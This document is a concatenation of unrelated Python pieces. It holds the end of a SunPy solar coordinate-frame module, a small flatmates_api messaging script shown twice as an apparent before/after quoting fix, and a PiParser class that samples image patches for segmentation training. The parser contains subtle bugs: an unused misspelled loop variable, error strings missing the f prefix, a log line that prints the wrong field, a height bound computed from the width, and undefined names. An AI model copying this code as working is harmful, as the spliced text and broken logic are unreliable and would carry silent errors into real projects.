<Helioprojective Coordinate (obstime=2020-04-08T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
[( 0., 0., 0.99660825), ( 319., 0., 0.99687244),
( 638., 0., 0.99778472), ( 957., 0., 1.00103285),
(1276., 0., nan), (1595., 0., nan),
(1914., 0., nan)]>
>>> with Helioprojective.assume_spherical_screen(h.observer):
... print(h.make_3d())
<Helioprojective Coordinate (obstime=2020-04-08T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
[( 0., 0., 1.00125872), ( 319., 0., 1.00125872),
( 638., 0., 1.00125872), ( 957., 0., 1.00125872),
(1276., 0., 1.00125872), (1595., 0., 1.00125872),
(1914., 0., 1.00125872)]>
>>> with Helioprojective.assume_spherical_screen(h.observer, only_off_disk=True):
... print(h.make_3d())
<Helioprojective Coordinate (obstime=2020-04-08T00:00:00.000, rsun=695700.0 km, observer=<HeliographicStonyhurst Coordinate for 'earth'>): (Tx, Ty, distance) in (arcsec, arcsec, AU)
[( 0., 0., 0.99660825), ( 319., 0., 0.99687244),
( 638., 0., 0.99778472), ( 957., 0., 1.00103285),
(1276., 0., 1.00125872), (1595., 0., 1.00125872),
(1914., 0., 1.00125872)]>
"""
try:
old_spherical_screen = cls._spherical_screen # nominally None
center_hgs = center.transform_to(HeliographicStonyhurst(obstime=center.obstime))
cls._spherical_screen = {
'center': center,
'radius': center_hgs.radius,
'only_off_disk': only_off_disk
}
yield
finally:
cls._spherical_screen = old_spherical_screen
@add_common_docstring(**_frame_parameters())
class HeliocentricEarthEcliptic(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Heliocentric Earth Ecliptic (HEE) system.
- The origin is the center of the Sun.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the Sun-Earth line.
- The Z-axis (+90 degrees latitude) is aligned with the component perpendicular to the X-axis
of the mean ecliptic pole at the observation time.
Parameters
----------
{data}
{lonlat}
{distance_sun}
{common}
"""
@add_common_docstring(**_frame_parameters())
class GeocentricSolarEcliptic(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Geocentric Solar Ecliptic (GSE) system.
- The origin is the center of the Earth.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the Earth-Sun line.
- The Z-axis (+90 degrees latitude) is aligned with the component perpendicular to the X-axis
of the mean ecliptic pole at the observation time.
Parameters
----------
{data}
{lonlat}
{distance_earth}
{common}
Notes
-----
Aberration due to Earth motion is not included.
"""
@add_common_docstring(**_frame_parameters())
class HeliocentricInertial(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Heliocentric Inertial (HCI) system.
- The origin is the center of the Sun.
- The Z-axis (+90 degrees latitude) is aligned with the Sun's north pole.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the solar ascending
node on the ecliptic (mean J2000.0).
Parameters
----------
{data}
{lonlat}
{distance_sun}
{common}
Notes
-----
The solar ascending node on the ecliptic lies on the intersection of the solar equatorial
plane with the ecliptic plane, not on the intersection of the celestial equatorial plane with
the ecliptic plane.
"""
@add_common_docstring(**_frame_parameters())
class GeocentricEarthEquatorial(SunPyBaseCoordinateFrame):
"""
A coordinate or frame in the Geocentric Earth Equatorial (GEI) system.
- The origin is the center of the Earth.
- The Z-axis (+90 degrees latitude) is aligned with the Earth's north pole.
- The X-axis (0 degrees longitude and 0 degrees latitude) is aligned with the mean (not true)
vernal equinox.
Parameters
----------
{data}
{lonlat}
{distance_earth}
{equinox}
{common}
Notes
-----
Aberration due to Earth motion is not included.
"""
equinox = TimeFrameAttributeSunPy(default=_J2000)
|
import json
from flatmates_api import Flatmates
api = Flatmates(
sessionId="abcd",
flatmatesSessionId="abcd",
csrfToken="abcd",
)
# search people
people = api.search(location="west-end-4101", min_price=300, max_depth=1)
# send message
person = people[0]
error = api.send_message(person.get("memberId"), "Hi :)")
if error:
print(f'Error sending message to {person.get('memberId')}') | import json
from flatmates_api import Flatmates
api = Flatmates(
sessionId="abcd",
flatmatesSessionId="abcd",
csrfToken="abcd",
)
# search people
people = api.search(location="west-end-4101", min_price=300, max_depth=1)
# send message
person = people[0]
error = api.send_message(person.get("memberId"), "Hi :)")
if error:
print(f'Error sending message to {person.get("memberId")}') |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is covered by the LICENSE file in the root of this project.
from __future__ import annotations
import pathlib
import typing
import cv2
import numpy as np
from piutils.piutils import pi_log
from . import pi_dataset
from . import pi_transform
logger = pi_log.get_logger(__name__)
class PiParser:
"""A dataset parser for a instance segmentation, object detcetion or semantic segmentation network.
Implements __len__ and __getitem__ as the PyTorch's map-style dataset class
(but has no PyTorch dependencies).
As we frequently deal with images larger that GPU memory, the parser works
by sampling subregions from images in a custom dataset format.
The sampling behaviour is reproducable. For a given item index n and parser config,
__getitem__(n) will always sample the same region and
apply the same data augmentation (if specified in the config).
Usage:
parser = PiParser(
config={...}, split_name="train", numpy_to_tensor_func=torch.from_numpy
)
for input_image, target_dict in parser:
instance_class_labels = target_dict["labels"] # shape (num_instances,)
instance_masks = target_dict["masks"] # shape (num_instances, target_height, target_width)
instance_bounding_boxes = target_dict["boxes"] # shape (num_instances, 4)
For a complete usage example, see examples/parser.py.
"""
def __init__(
self,
split_name: str,
num_samples: int,
config: typing.Dict,
numpy_to_tensor_func: typing.Optional[
typing.Callable[[np.ndarray], typing.Any]
] = None,
):
"""
Args:
split_name:
Name of the dataset split to be parsed (same as used in config).
Allows different settings for each split withing the same config file.
Typical options 'train', 'val' and 'test'.
num_samples:
Number of random image subregions to be sampled. Set to a multiple of the batch size.
config:
A nested dictionary that defines from where and how the data is parsed.
Important configuration parameters are:
'datasets', {split_name}:
A list of datasets to draw samples from. Each item is a dictionary
with keys:
'path':
Where to find the dataset on disk.
'sampling_weight':
Proportional to the frequency samples are drawn from this dataset.
Not relevant if there is only a single dataset in the list.
'input_layers':
A list of input layers (should be present in all parsed datasets).
Each item in a dictionary with keys:
'name':
E.g. 'rgb'.
'channels':
The number of channels, e.g. 3.
'mean' and 'std':
Two arrays of floats used for input normalization, i.e.,
input_normalized = (input - mean) / std.
Size should be equal to 'channels'.
'instance_filter':
A dictonary with keys 'min_box_area', 'min_mask_area'.
Instances with a bounding box or a mask smaller than these
values are filtered out.
'model_input':
The input size of the network.
A dictionary with keys 'height' and 'width'.
'model_output':
The output size of the network.
A dictionary with keys 'height', 'width', 'offset_x', 'offset_y', 'stride_x', 'stride_y'.
Height and width are given with respect to the model input, i.e.,
if input_image (a numpy.ndarray) is the network input,
the subregion that overlaps the network output 1:1 is:
image[
output_offset_y : output_offset_y + output_height : output_stride_y,
output_offset_x : output_offset_x + output_width : output_stride_x,
]
The spatial dimensions of the return target tensors are:
target_height = height // stride_y
target_width = width // stride_x
'required_targets':
A dictionary with keys
'area',
'boxes',
'iscrowd',
'keypoints',
'labels',
'masks',
'semantics',
and boolean values.
Determines which outputs the parser should provide, also see __getitem__.
'samplers', {split_name}:
A list of sampling strategies. The 'weight' parameter determines the frequence
the strategy in question is used. There are two sampling strategies:
'uniform':
Samples a patch anyhwhere within the image.
'instances':
Samples a patch from image regions with plant instances
the frequence of each class is determined by the 'sampling_weight',
see 'semantic_labels'.
See examples/parser.py for details.
'seed', {split_name}:
Used to initialize the random state and have reproducable sampling behaviour.
'semantic_labels':
A list of semantic class labels contained in the parsed dataset (and learned by the model).
Each item is a dictionary with keys:
'name':
Name of the semantic class.
'color':
Used for visualization.
'has_instances'
A boolean. True if this is a class that sould be considered to have instances.
'join_with':
A list of other labels present in the dataset to be remapped to this class.
'sampling_weight':
Used by the 'instances' sampler. Roughly proportional to the frequency
representatives of this class are contained in the parsed images.
'transforms', {split_name}:
A list of random transforms applied to each split of the dataset for data augmentation.
numpy_to_tensor_func:
A framework-dependent conversion function to make a tensor out of a numpy.ndarray.
If None, no conversion is performed and returned type is numpy.ndarray.
Options might be
torch.from_numpy (PyTorch) and
tf.convert_to_tensor (Tensorflow).
"""
self._config = config
self._split_name = split_name
self._numpy_to_tensor_func = numpy_to_tensor_func
self._input_width = self._config["model_input"]["width"]
self._input_height = self._config["model_input"]["height"]
self._output_width = self._config["model_output"]["width"]
self._output_height = self._config["model_output"]["height"]
self._output_offset_x = self._config["model_output"]["offset_x"]
self._output_offset_y = self._config["model_output"]["offset_y"]
self._output_stride_x = self._config["model_output"]["stride_x"]
self._output_stride_y = self._config["model_output"]["stride_y"]
self._size = num_samples
seed = self._config["seed"][self._split_name]
random = np.random.RandomState(seed)
self._seeds = random.choice(
2 ** 32, size=self._size
) # one random seed for each item
# get datasets for this split from config
datasets_data = [
dataset_data for dataset_data in self._config["datasets"][self._split_name]
]
dataset_data_per_dataset = {
pi_dataset.PiDataset(path=pathlib.Path(dataset_data["path"])): dataset_data
for dataset_data in datasets_data
}
# get semantic labels from config
self._semantic_labels = {
semantic_label_data["name"]: {
"sampling_weight": semantic_label_data["sampling_weight"],
"index": semantic_label_index,
"join_with": semantic_label_data["join_with"],
"has_instances": semantic_label_data["has_instances"],
"color": semantic_label_data["color"],
}
for semantic_label_index, semantic_label_data in enumerate(
self._config["semantic_labels"]
)
}
logger.info("Semantic labels:")
for semantic_label_name, semantic_label_data in self._semantic_labels.items():
logger.info(f" * '{semantic_label_name}':")
logger.info(f" Index: {semantic_label_data["index"]}")
logger.info(
f" Sampling weight: {semantic_label_data["sampling_weight"]}"
)
logger.info(
f" Has instances: {semantic_label_data["sampling_weight"]}"
)
# prepare the 'join_with' option
# remap a group of labels to a single class
self._semantic_labels_mapping = {
**{
semantic_label_name: semantic_label_name
for semantic_label_name in self._semantic_labels
},
**{
semantic_label_to_join: semantic_label_name
for semantic_label_name, semantic_label_data in self._semantic_labels.items()
for semantic_label_to_join in semantic_label_data["join_with"]
},
}
logger.info(f"Remap semantic labels '{self._split_name}':")
for (
semantic_label_name,
mapped_to_name,
) in self._semantic_labels_mapping.items():
logger.info(f" * {semantic_label_name} \u2192 {mapped_to_name}")
# get samplers for this split from config
samplers_data = [
{"type": sampler_type, **sampler_data}
for sampler_dict in self._config["samplers"][self._split_name]
for sampler_type, sampler_data in sampler_dict.items()
]
if not samplers_data:
raise ValueError(f"No samplers defined for split: '{self._split_name}'")
# get valid instances samplings index (list of instances that are allowed to be sampled)
# if instances sampler is used (some datasets can contain no instance of any semantic class)
if any((sampler_data["type"] == "instances" for sampler_data in samplers_data)):
self._instances_sampling_index_data_per_dataset = {}
self._instances_sampling_weights_per_dataset = {}
for dataset in dataset_data_per_dataset.keys():
sampling_index_data = dataset.sampling_index("instances")
semantic_labels_to_join = [
[semantic_label_data["name"]] + semantic_label_data["join_with"]
for semantic_label_data in self._config["semantic_labels"]
if semantic_label_data["has_instances"]
]
sampling_index_data = {
semantic_label_names[0]: [
sampling_item
for semantic_label_name in semantic_label_names
if semantic_label_name in sampling_index_data
for sampling_item in sampling_index_data[semantic_label_name]
]
for semantic_label_names in semantic_labels_to_join
}
# filter out those labels that do not have any items
sampling_index_data = {
semantic_label_name: sampling_item_data
for semantic_label_name, sampling_item_data in sampling_index_data.items()
if sampling_item_data
}
semantic_label_sampling_weights_norm = sum(
self._semantic_labels[semantic_label_name]["sampling_weight"]
for semantic_label_name in sampling_index_data
)
semantic_label_sampling_weights = [
self._semantic_labels[semantic_label_name]["sampling_weight"]
/ semantic_label_sampling_weights_norm
for semantic_label_name in sampling_index_data
]
if sampling_index_data and semantic_label_sampling_weights_norm > 0.0:
self._instances_sampling_index_data_per_dataset[
dataset
] = sampling_index_data
self._instances_sampling_weights_per_dataset[
dataset
] = semantic_label_sampling_weights
else:
logger.warning(
f"No instances to sample in dataset '{dataset.name}', split '{self._split_name}'."
)
# get valid samplers per dataset
self._sampler_data_per_dataset = {}
self._sampler_weight_per_dataset = {}
for dataset in dataset_data_per_dataset.keys():
if dataset_data_per_dataset[dataset]["sampling_weight"] <= 0.0:
logger.warning(
f"Dataset '{dataset.name}', split '{self._split_name}' with non-positive sampling weight."
)
continue
samplers_data_for_dataset = []
samplers_weights_for_dataset = []
for sampler_data in samplers_data:
accept = False
if sampler_data["type"] not in ["uniform", "instances"]:
raise NotImplementedError(
"Sampler '{sampler_data['type']}' not recognized."
)
if sampler_data["type"] in ["uniform"] and sampler_data["weight"] > 0.0:
accept = True
if (
sampler_data["type"] in ["instances"]
and sampler_data["weight"] > 0.0
and dataset
in self._instances_sampling_index_data_per_dataset # exclude if not instances to sample
):
accept = True
if accept:
samplers_data_for_dataset.append(sampler_data)
samplers_weights_for_dataset.append(sampler_data["weight"])
else:
logger.warning(
f"Sampler '{sampler_data["type"]}' invalid for dataset '{dataset.name}', "
f"split '{self._split_name}'."
)
if samplers_data_for_dataset:
samplers_weights_norm = sum(samplers_weights_for_dataset)
if samplers_weights_norm <= 0.0:
raise ValueError(
"Invalid sampling configuration for dataset '{dataset.name}', "
f"split '{self._split_name}'."
)
samplers_weights_for_dataset = [
weight / samplers_weights_norm
for weight in samplers_weights_for_dataset
]
self._sampler_data_per_dataset[dataset] = samplers_data_for_dataset
self._sampler_weight_per_dataset[dataset] = samplers_weights_for_dataset
else:
logger.warning(
f"Ignoring dataset '{dataset.name}', "
f"split '{self._split_name}' with no valid samplers."
)
if not self._sampler_data_per_dataset:
raise ValueError(
f"No valid samplers for split '{self._split_name}'. "
"If samples 'instances' is used as the only sampler, "
"make sure one of dataset contains instances with the "
"semantic labels defined in the config."
)
# keep those datasets with valid samplers
self._datasets = [dataset for dataset in self._sampler_data_per_dataset.keys()]
datasets_sampling_weights = [
dataset_data_per_dataset[dataset]["sampling_weight"]
for datset in self._datasets
]
datasets_sampling_weights_norm = sum(datasets_sampling_weights)
self._datasets_sampling_weights = [
weight / datasets_sampling_weights_norm
for weight in datasets_sampling_weights
]
logger.info(
f"Using {len(self._datasets)} dataset(s) from split '{self._split_name}':"
)
for dataset, sampling_weight in zip(
self._datasets, self._datasets_sampling_weights
):
logger.info(f" * Name: {dataset.name}")
logger.info(f" Sampling weight (normalized): {sampling_weight}")
logger.info(
f" Samplers: "
+ str(
[
sampler_data["type"]
for sampler_data in self._sampler_data_per_dataset[dataset]
]
)
)
logger.info(
f" Sampler weights (normalized): {self._sampler_weight_per_dataset[dataset]}"
)
# get transforms for this split from config
self._geometry_transforms_data = [
{"type": transform_type, **transform_data}
for transform_dict in self._config["transforms"][self._split_name]
for transform_type, transform_data in transform_dict.items()
if transform_type in {"affine"}
]
self._color_transforms_data = [
{"type": transforms_type, **transforms_data}
for transforms_dict in self._config["transforms"][self._split_name]
for transforms_type, transforms_data in transforms_dict.items()
if transforms_type in {"hsv", "contrast", "blur"}
]
logger.info(
f"Using {len(self._geometry_transforms_data)} "
f"+ {len(self._color_transforms_data)} random transforms for data augmentation:"
)
for transform_data in (
self._geometry_transforms_data + self._color_transforms_data
):
logger.info(f" * Type: {transform_data["type"]}")
sample_size = np.max([self._input_width, self._input_height])
affine_transform_data = next(
(
transform_data
for transform_data in self._geometry_transforms_data
if transform_data["type"] == "affine"
),
None,
)
if affine_transform_data is not None:
scaling_max = np.max(
np.absolute(
[
affine_transform_data["scaling_x_min"],
affine_transform_data["scaling_x_max"],
affine_transform_data["scaling_y_min"],
affine_transform_data["scaling_y_max"],
]
)
)
sample_size *= scaling_max
shearing_max = np.max(
np.absolute(
[
affine_transform_data["shearing_x_min"],
affine_transform_data["shearing_x_max"],
affine_transform_data["shearing_y_min"],
affine_transform_data["shearing_y_max"],
]
)
)
if shearing_max != 0.0:
sample_size += np.absolute(np.sin(shearing_max) * sample_size)
translation_max = np.max(
np.absolute(
[
affine_transform_data["translation_x_min"],
affine_transform_data["translation_x_max"],
affine_transform_data["translation_y_min"],
affine_transform_data["translation_y_max"],
]
)
)
sample_size += translation_max
rotation_max = np.max(
np.absolute(
[
affine_transform_data["rotation_min"],
affine_transform_data["rotation_max"],
]
)
)
if rotation_max != 0.0:
sample_size *= np.sqrt(2.0)
sample_size = np.ceil(sample_size).astype(np.int).item()
self._sample_size = sample_size
logger.info(f"Drawing samples of size: {self._sample_size}")
self._geometry_transforms = [
self._geometry_transform_from_data(transform_data)
for transform_data in self._geometry_transforms_data
]
self._color_transforms = [
self._color_transform_from_data(transform_data)
for transform_data in self._color_transforms_data
]
# get input layers and normalization from config
mean = self._input_mean_from_config()
std = self._input_std_from_config()
input_layer_names = []
input_channels = 0
for input_layer_data in self._config["input_layers"]:
input_layer_names += [input_layer_data["name"]]
input_channels += input_layer_data["channels"]
self._input_layer_names = input_layer_names
self._input_channels = input_channels
self._mean = np.asarray(mean, dtype=np.float32).reshape(1, 1, -1)
self._std = np.asarray(std, dtype=np.float32).reshape(1, 1, -1)
logger.info("Input layers:")
for input_layer_data in self._config["input_layers"]:
logger.info(f" * Name: {input_layer_data["name"]}")
logger.info(f" * Channels: {input_layer_data["channels"]}")
@property
def config(self) -> typing.Dict:
return self._config
@property
def semantic_labels(self) -> typing.Dict:
return self._semantic_labels
@property
def semantic_labels_mapping(self) -> typing.Dict[str, str]:
return self._semantic_labels_mapping
@property
def mean(self) -> np.ndarray:
return self._mean
@property
def std(self) -> np.ndarray:
return self._std
@property
def output_width(self) -> int:
return self._output_width
@property
def output_height(self) -> int:
return self._output_height
@property
def output_offset_x(self) -> int:
return self._output_offset_x
@property
def output_offset_y(self) -> int:
return self._output_offset_y
@property
def output_stride_x(self) -> int:
return self._output_stride_x
@property
def output_stride_y(self) -> int:
return self._output_stride_y
def _sample(self, random: np.random.RandomState) -> typing.Dict[str, np.ndarray]:
dataset = random.choice(
self._datasets, p=self._datasets_sampling_weights, replace=False
)
if __debug__:
logger.debug(
f"Sample from dataset '{dataset.name}' (split '{self._split_name}')."
)
sampler_data = random.choice(
self._sampler_data_per_dataset[dataset],
p=self._sampler_weight_per_dataset[dataset],
replace=False,
)
if __debug__:
logger.debug(f"Using sampler '{sampler_data["type"]}'.")
if sampler_data["type"] == "uniform":
dataset_item_names = list(dataset.items.keys())
dataset_item_name = random.choice(dataset_item_names, replace=False)
if __debug__:
logger.debug(f"Sampling from dataset item '{dataset_item_name}'.")
dataset_item = dataset.items[dataset_item_name]
offset_x = sampler_data["offset_from_boundary_x"]
offset_y = sampler_data["offset_from_boundary_y"]
if offset_x > dataset_item.width - offset_x:
raise RuntimeError(
"Offset from boundary ({offset_x}) larger than "
f"half raster width ({dataset_item.width}): {dataset_item_name}"
)
if offset_y > dataset_item.height - offset_y:
raise RuntimeError(
"Offset from boundary ({offset_y}) larger than "
f"half raster height ({dataset_item.height}): {dataset_item_name}"
)
seed_x = random.uniform(offset_x, dataset_item.width - offset_x)
seed_y = random.uniform(offset_y, dataset_item.height - offset_y)
elif sampler_data["type"] == "instances":
sampling_index_data = self._instances_sampling_index_data_per_dataset[
dataset
]
semantic_label_sampling_weights = (
self._instances_sampling_weights_per_dataset[dataset]
)
if not sampling_index_data:
raise ValueError(
f"No instances in sampling index of dataset: '{dataset.path}'"
)
semantic_label_name = random.choice(
list(sampling_index_data.keys()),
p=semantic_label_sampling_weights,
replace=False,
)
sampling_seed_data = random.choice(
sampling_index_data[semantic_label_name], replace=False
)
dataset_item_name = sampling_seed_data["itemName"]
if __debug__:
logger.debug(f"Sampling from dataset item '{dataset_item_name}'.")
dataset_item = dataset.items[dataset_item_name]
seed_x = sampling_seed_data["coordinates"][0]
seed_y = sampling_seed_data["coordinates"][1]
else:
raise NotImplementedError(
"Sampler not implemented: '{sampler_data['type']}'"
)
seed_x = np.round(seed_x).astype(np.int).item()
seed_y = np.round(seed_y).astype(np.int).item()
x = seed_x - self._sample_size // 2
y = seed_y - self._sample_size // 2
width = self._sample_size
height = self._sample_size
input_raster, imap, annotations = self._query_region_from_map(
dataset_item=dataset_item, x=x, y=y, width=width, height=height
)
# apply transforms
for geometry_transform in self._geometry_transforms:
geometry_transform.resample(random=random)
input_raster = geometry_transform.transform_raster(
input_raster, fill_value=0.0, interpolation="linear"
)
imap = geometry_transform.transform_raster(
imap, fill_value=pi_dataset.IMAP_IGNORE, interpolation="nearest"
)
for annotation_object_id, annotation_object_data in annotations.items():
if "keypoints" in annotation_object_data:
keypoint_positions = np.asarray(
[
keypoint_data["coordinates"]
for keypoint_data in annotation_object_data["keypoints"]
]
)
if keypoint_positions.size:
keypoint_positions = geometry_transform.transform_points(
keypoint_positions
)
annotation_object_data["keypoints"] = [
{"coordinates": keypoint_positions[keypoint_index].tolist()}
for keypoint_index in range(keypoint_positions.shape[0])
]
for color_transform in self._color_transforms:
color_transform.resample(random=random)
input_raster = color_transform.transform_raster(
input_raster, fill_value=0.0, interpolation="linear"
)
# normalize input
input_raster = (input_raster.astype(np.float32) - self._mean) / self._std
input_raster = input_raster.transpose((2, 0, 1)) # channels first
if __debug__:
logger.debug(f"Input raster shape: {input_raster.shape}")
logger.debug("Input raster range (after normalization):")
for channel_index in range(input_raster.shape[0]):
input_band = input_raster[channel_index]
logger.debug(f" * Band {channel_index}:")
logger.debug(f" Min: {input_band.min()}")
logger.debug(f" Max: {input_band.max()}")
logger.debug(f" Mean: {input_band.mean()}")
logger.debug(f" Dtype: {input_band.dtype}")
# debug output
# cv2.imshow(f"input_band_{channel_index}", input_band)
# cv2.waitKey()
# imap to output size of model
imap = imap[
self._output_offset_y : (
self._output_offset_y + self._output_height
) : self._output_stride_y,
self._output_offset_x : (
self._output_offset_x + self._output_width
) : self._output_stride_x,
]
target = self._make_target(
imap=imap,
annotations=annotations,
geometry_transforms=self._geometry_transforms,
)
return self._numpy_to_tensor(input_raster), target
def _make_target(
self,
imap: np.ndarray,
annotations: typing.Dict,
geometry_transforms: typing.List[pidata.pi_transform.PiRandomTransform],
) -> typing.Dict[str, typing.Union[np.ndarray, typing.Any]]:
imap_ids = np.unique(imap)
target_height = self._output_height // self._output_stride_y
target_width = self._output_width // self._output_stride_x
if self._config["required_targets"]["semantics"]:
semantics = np.zeros(
(target_height, target_width),
dtype=np.int64,
)
# per-instance annotations
if self._config["required_targets"]["boxes"]:
boxes = []
if self._config["required_targets"]["labels"]:
labels = []
if self._config["required_targets"]["area"]:
area = []
if self._config["required_targets"]["iscrowd"]:
iscrowd = []
if self._config["required_targets"]["masks"]:
masks = []
if self._config["required_targets"]["keypoints"]:
keypoints = []
max_x = np.floor(self._output_width / self._output_stride_x)
max_y = np.floor(self._output_width / self._output_stride_y)
for annotation_object_id, annotation_object in annotations.items():
if (
annotation_object["type"] in ["segment", "instance"]
and "imapIds" in annotation_object
and any(
(
annotation_imap_id in imap_ids
for annotation_imap_id in annotation_object["imapIds"]
)
)
):
annotation_mask = np.isin(imap, annotation_object["imapIds"])
semantic_label_name = annotation_object["semanticLabelName"]
if semantic_label_name not in self.semantic_labels:
logger.warning(f"Ignore unknown label: {semantic_label_name}")
continue
if not self.semantic_labels[semantic_label_name]["has_instances"]:
continue
semantic_label_index = self.semantic_labels[semantic_label_name][
"index"
]
if self._config["required_targets"]["semantics"]:
semantics[annotation_mask] = semantic_label_index
if annotation_object["type"] in ["instance"]:
annotation_mask_uint8 = annotation_mask.astype(np.uint8)
box_x, box_y, box_width, box_height = cv2.boundingRect(
annotation_mask_uint8.astype(np.uint8)
)
box_x0 = np.clip(box_x, 0.0, max_x)
box_x1 = np.clip(box_x + box_width, 0.0, max_x)
box_y0 = np.clip(box_y, 0.0, max_y)
box_y1 = np.clip(box_y + box_height, 0.0, max_y)
box = np.asarray([box_x0, box_y0, box_x1, box_y1])
box_area = (box[2] - box[0]) * (box[3] - box[1])
if (
"instance_filter" in self.config
and box_area < self.config["instance_filter"]["min_box_area"]
):
continue
if "instance_filter" in self.config and (
annotation_mask.sum()
< self.config["instance_filter"]["min_mask_area"]
):
continue
if self._config["required_targets"]["boxes"]:
boxes.append(box)
if self._config["required_targets"]["area"]:
area.append(box_area)
if self._config["required_targets"]["labels"]:
labels.append(semantic_label_index)
if self._config["required_targets"]["iscrowd"]:
iscrowd.append(0)
if self._config["required_targets"]["masks"]:
masks.append(annotation_mask_uint8)
if self._config["required_targets"]["keypoints"]:
if (
"keypoints" in annotation_object
and annotation_object["keypoints"]
):
keypoint_position = (
np.asarray(
annotation_object["keypoints"][0]["coordinates"],
dtype=np.float32,
)
- np.asarray(
[self._output_offset_x, self._output_offset_y],
dtype=np.float32,
)
) / np.asarray(
[self._output_stride_x, self._output_stride_y],
dtype=np.float32,
)
keypoint_is_visible = (
keypoint_position[0] >= 0
and keypoint_position[0] < self._output_width
and keypoint_position[1] >= 0.0
and keypoint_position[1] < self._output_height
)
else:
keypoint_is_visible = False
if keypoint_is_visible:
keypoints.append(
np.asarray(
[[keypoint_position[0], keypoint_position[1], 1.0]],
dtype=np.float32,
)
)
else:
keypoints.append(
np.asarray([[0.0, 0.0, 0.0]], dtype=np.float32)
)
target = {}
if self._config["required_targets"]["semantics"]:
semantics[imap == pi_dataset.IMAP_IGNORE] = len(self.semantic_labels)
target["semantics"] = self._numpy_to_tensor(semantics)
if self._config["required_targets"]["boxes"]:
target["boxes"] = self._numpy_to_tensor(
np.asarray(boxes, dtype=np.float32).reshape(-1, 4)
)
if self._config["required_targets"]["labels"]:
target["labels"] = self._numpy_to_tensor(
np.asarray(labels, dtype=np.int64).reshape(-1)
)
if self._config["required_targets"]["area"]:
target["area"] = self._numpy_to_tensor(
np.asarray(area, dtype=np.float32).reshape(-1)
)
if self._config["required_targets"]["iscrowd"]:
target["iscrowd"] = self._numpy_to_tensor(
np.asarray(iscrowd, dtype=np.uint8).reshape(-1)
)
if self._config["required_targets"]["masks"]:
target["masks"] = self._numpy_to_tensor(
np.asarray(masks, dtype=np.uint8).reshape(
-1, target_height, target_width
)
)
if self._config["required_targets"]["keypoints"]:
target["keypoints"] = self._numpy_to_tensor(
np.asarray(keypoints, dtype=np.float32).reshape(-1, 1, 3)
)
return target
def get_height_and_width(self) -> typing.Tuple[int, int]:
"""
Returns:
A tuple (height, width). The size of the parsed input images.
"""
return self._input_height, self._input_width
def __len__(self) -> int:
"""
Returns:
The total number of samples that cam be drawn.
"""
return self._size
def __getitem__(
self, index: int
) -> typing.Tuple[np.ndarray, typing.Dict[str, np.ndarray]]:
"""
Returns:
A tuple of an input image and target (a dictionary).
The tensor data type depends on the numpy_to_tensor_func
given in the constructor and is numpy.ndarray by default.
The target is a dictionary with keys as indicated
in 'required_targets' in the config passed to the parser.
Options are:
'semantics':
A tensor of shape (height, width), dtype int64
with semantic label IDs. IDs start from 0 and range to
{number of semantic labels} as given in the config dictionary
passed to the parser.
ID 0 marks Soil/Background pixels.
The highest ID == <number of semantic classes> marks pixels
to be ignored (if applicable for the model):
0 -> first semantic label in config (should be Soil/Background),
1 -> second semantic label in config,
2 -> third semantic label in config,
...
{number of semantic classes} -> pixels to be ignored
'boxes':
A tensor of shape (num_instances, 4) and dtype float32.
Bounding box coordinates of each instance in order x0, y0, x1, y1.
'labels':
A tensor of shape (num_instances,) and dtype int64.
The semantic label ID per instance.
Also see 'semantics'.
'area':
A tensor of shape (num_instances,) and dtype float32.
The area of each instance's bounding box.
Can be used for evaluation.
'iscrowd':
A tensor of shape (num_instances,) and dtype uint8.
COCO-like. For now, always 0.
'masks':
A tensor of shape (num_instances, height, width) and dtype uint8.
The binary mask of each instance.
'keypoints':
A tensor of shape (num_instances, 1, 3) and dtype uint8.
Stem keypoint positions in x, y, visibility.
If visibility is 0, x and y are also 0.
'image_id' (always returned):
A tensor of shape (,) and dtype int64.
Equals the index of this sample.
"""
input_raster, target = self._sample(
random=np.random.RandomState(self._seeds[index])
)
target["image_id"] = self._numpy_to_tensor(np.asarray(index, dtype=np.int64))
return input_raster, target
def _numpy_to_tensor(self, numpy_array) -> typing.Union[np.ndarray, typing.Any]:
if self._numpy_to_tensor_func is not None:
return self._numpy_to_tensor_func(numpy_array)
else:
return numpy_array
def _query_region_from_map(
self, dataset_item: CiDatasetItemType, x: int, y: int, width: int, height: int
) -> typing.Tuple[np.ndarray, np.ndarray, typing.Dict]:
"""
Returns:
Tuple of input raster, imap and annotations (not transformed!).
"""
input_rasters = []
for input_layer_name in self._input_layer_names:
raster = dataset_item.map.provide_raster(
raster_layer_name=input_layer_name, x=x, y=y, width=width, height=height
).reshape(height, width, -1)
if raster.dtype in [np.uint8, np.uint16]:
raster = (raster.astype(np.float32) / 255.0).clip(0.0, 1.0)
elif raster.dtype in [np.float, np.float32]:
raster = raster.astype(np.float32)
else:
raise NotImplementedError()
input_rasters.append(raster)
input_raster = np.concatenate(input_rasters, axis=-1)
imap = (
dataset_item.map.provide_raster(
raster_layer_name="imap", x=x, y=y, width=width, height=height
)
.reshape(height, width)
.astype(np.uint16)
)
annotations = dataset_item.map.query_intersection(
vector_layer_name="annotations",
x=x,
y=y,
width=width,
height=height,
resolve_objects=True,
)
# transform annotations
for annotation_object_id, annotation_object_data in annotations.items():
if "boundingBox" in annotation_object_data:
del annotation_object_data["boundingBox"]
if "keypoints" in annotation_object_data:
annotation_object_data["keypoints"] = [
{
"coordinates": [
keypoint_data["coordinates"][0] - x,
keypoint_data["coordinates"][1] - y,
]
}
for keypoint_data in annotation_object_data["keypoints"]
]
if "semanticLabelName" in annotation_object_data:
semantic_label_name = annotation_object_data["semanticLabelName"]
if semantic_label_name in self._semantic_labels_mapping:
annotation_object_data[
"semanticLabelName"
] = self._semantic_labels_mapping[
annotation_object_data["semanticLabelName"]
]
else:
# map to first semantic label in list, it should usually be the Soil/Background class
logger.error(
f"Unexpected semantic label '{semantic_label_name}' "
f"in dataset item '{dataset_item.name}' "
f"in dataset '{dataset_item.dataset.name}' ({dataset_item.path})."
)
annotation_object_data["semanticLabelName"] = next(
iter(self._semantic_labels_mapping.keys())
)
